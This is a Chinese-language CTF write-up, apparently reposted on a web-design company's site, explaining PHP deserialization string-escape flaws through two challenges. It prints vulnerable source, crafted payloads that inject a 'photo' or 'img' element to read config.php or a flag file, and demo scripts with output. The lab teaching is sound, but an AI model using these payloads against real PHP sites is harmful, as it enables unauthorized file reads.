這篇文章給大家介紹如何在PHP項(xiàng)目中實(shí)現(xiàn)一個反序列化字符串逃逸功能,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
公司主營業(yè)務(wù):成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)推出加查免費(fèi)做網(wǎng)站回饋大家。任何具有一定結(jié)構(gòu)的數(shù)據(jù),如果經(jīng)過了某些處理而把結(jié)構(gòu)體本身的結(jié)構(gòu)給打亂了,則有可能會產(chǎn)生漏洞。
0CTF 2016piapiapia-----反序列化后長度遞增
安詢杯2019-easy_serialize_php-----反序列化后長度遞減
由于是代碼審計(jì),直接訪問www.zip發(fā)現(xiàn)備份的源碼,有一下文件,flag就在config.php,因此讀取即可
class.php //主要有mysql類(mysql基本操作)和user類(繼承mysql實(shí)現(xiàn)功能點(diǎn))
config.php //環(huán)境配置
index.php //登陸
profile.php //查看自己上傳的文件
register.php //注冊
update.php //文件上傳
源碼分析
然后分析代碼,我喜歡通過功能點(diǎn)來分析,既然有注冊,登陸,那么自然來看看SQL咯,發(fā)現(xiàn)class.php中mysql類的filter過濾函數(shù),過濾了增刪查改,基本無望.
后面就看看文件上傳,發(fā)現(xiàn)也對上傳的文件參數(shù)進(jìn)行了限制,但是發(fā)現(xiàn)對文件進(jìn)行了序列化處理,那么肯定有反序列化,在profile.php中發(fā)現(xiàn)對上傳的文件進(jìn)行反序列化處理,并對文件$profile['photo']進(jìn)行讀取.我們再回到文件上傳點(diǎn),發(fā)現(xiàn)$profile['photo'] = 'upload/' . md5($file['name']);,但是我們無法獲取加密后的文件值,后面有又看到文件上傳是先序列化,再進(jìn)過filter函數(shù)替換一些關(guān)鍵字,再反序列化,因此文件可能發(fā)生改變,因此可能有漏洞
payload構(gòu)造
我們知道,PHP反序列化時以;作為分隔點(diǎn),}做為結(jié)束標(biāo)志,根據(jù)長度來判斷讀取多少字符,我們無法控制$profile['photo']但是可以控制nickname,而nickname又進(jìn)行了長度限制,strlen函數(shù)卻無法處理數(shù)組,因此用數(shù)組進(jìn)行繞過即可我們在這里截?cái)?那么后面的則會被廢棄不再讀取,而我們要構(gòu)造的的payload是,最開始的";}是為了閉合前面數(shù)組nickname的{,后面的;}是為了截?cái)?讓反序列化結(jié)束,不再讀取后面的內(nèi)容,當(dāng)然這些都不能是字符哈.
";}s:5:"photo";s:10:"config.php";}
這時構(gòu)造了payload,那么就要來計(jì)算溢出數(shù)量了,我們構(gòu)造的payload長度為34,那么就要增加34個長度,由于where變成hacker會增加一個長度,那么我們就需要34個where,最終payload
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
原理解析
<?php function filter($string) { $escape = array('\'', '\\\\'); $escape = '/' . implode('|', $escape) . '/'; $string = preg_replace($escape, '_', $string); $safe = array('select', 'insert', 'update', 'delete', 'where'); $safe = '/' . implode('|', $safe) . '/i'; return preg_replace($safe, 'hacker', $string); } $profile = array( 'phone'=>'01234567890', 'email'=>'12345678@11.com', 'nickname'=>array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}'), 'photo'=>'upload/'.md5('1.jpg') ); print_r(serialize($profile)); echo PHP_EOL; print_r(filter(serialize($profile))); echo PHP_EOL; var_dump(unserialize(filter(serialize($profile)))); echo PHP_EOL; ?>
輸出結(jié)果展示,最開始不用進(jìn)過filter函數(shù)反序列化時,nickname數(shù)組的第一個值沒被截?cái)嗍且粋€整體wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";},剛好204個長度,經(jīng)過filter過濾函數(shù)后,where變成了hacker,反序列化的長度變化了,但是又只讀取204的長度,則s:5:"photo";s:10:"config.php";}";}就多出來了,作為另一個反序列化的其中一個元素,而末尾的'}又不是字符,因此被認(rèn)為反序列化結(jié)束了,后面的內(nèi)容被丟棄,因此可以任意讀取文件.
a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";} a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";} array(4) { 'phone' => string(11) "01234567890" 'email' => string(15) "12345678@11.com" 'nickname' => array(1) { [0] => string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker" } 'photo' => string(10) "config.php" }
源碼
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file" rel="external nofollow" >source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
分析
源碼不多,我就習(xí)慣先通讀一遍再回溯可能出現(xiàn)的漏洞點(diǎn),找可控參數(shù).通讀完全發(fā)現(xiàn)可能存在的漏洞點(diǎn):extract變量覆蓋,file_get_contents任意文件讀取.
將變量$userinfo['img']逆推回去發(fā)現(xiàn),是由參數(shù)img_path控制的,但是經(jīng)過sha1加密,我們無法得知加密后內(nèi)容,但結(jié)合前面的extract變量覆蓋,我們可以自己POST構(gòu)造.
構(gòu)造了之后,會經(jīng)過序列化filter函數(shù)替換一些字符(那么此時序列化后的數(shù)據(jù)則發(fā)生了變化,可能存在漏洞),再反序列化,讀取參數(shù)值.
我們?nèi)稳焕眯蛄谢?經(jīng)過過濾后長度發(fā)生變化來構(gòu)造payload,首先明白序列化后,有三個元素,分別是img,user,function,而我們能控制的只有后面兩個,我們需要構(gòu)造的payload是這樣的
f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}
但是不經(jīng)任何改變則是這樣的
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
我還是利用截?cái)嗟乃枷氩蛔屍渥x取元素img的值,我們自己來構(gòu)造這個值,只有兩個參數(shù),必須在function哪里截?cái)?而這個反序列是長度遞減,那么就是選擇元素吞噬(吞噬的長度自己酌情參考,一般是到自己能控制的點(diǎn)就好)后面的長度,來構(gòu)造自己的payload咯,我們就選user元素吧,len('";s:8:"function";s:10:"')的長度為23,但是我們無法構(gòu)造23個長度,我們可以多吞噬一個,24個字符,那么就用6個flag就好,但是這樣后面的序列化就混亂了,我們就要添加自己的payload,并補(bǔ)全.雖然這樣補(bǔ)好了,但是只有兩個元素,這里需要三個元素,我們就再添加元素,并將后面的img進(jìn)行截?cái)?br/>a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
a:3:{s:4:"user";s:24:"";s:8:"function";s:2:"22";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
截?cái)嘀恍鑮即可,并且不為讀取的字符即可,因此添加f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";},這里我們新增了一個元素,因此吞噬后function元素消失了,隨便補(bǔ)充好元素即可.
原理解析
<?php function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } $arr = array( "user"=>"flagflagflagflagflagflag", "function"=>'2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}', //"user"=>'guest', //"function"=>'show_image', "img"=>sha1(base64_encode('guest_img.png')) ); print_r(serialize($arr)); echo PHP_EOL; print_r(filter(serialize($arr))); echo PHP_EOL; print_r(unserialize(filter(serialize($arr)))); ?>
輸出展示
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
a:3:{s:4:"user";s:24:"";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
Array
(
[user] => ";s:8:"function";s:62:"2
[img] => ZDBnM19mMWFnLnBocA==
[tql] => tql
)
關(guān)于如何在PHP項(xiàng)目中實(shí)現(xiàn)一個反序列化字符串逃逸功能就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
文章標(biāo)題:如何在PHP項(xiàng)目中實(shí)現(xiàn)一個反序列化字符串逃逸功能-創(chuàng)新互聯(lián)
分享網(wǎng)址:http://jinyejixie.com/article20/dieeco.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、網(wǎng)站導(dǎo)航、網(wǎng)站排名、品牌網(wǎng)站制作、企業(yè)網(wǎng)站制作、移動網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容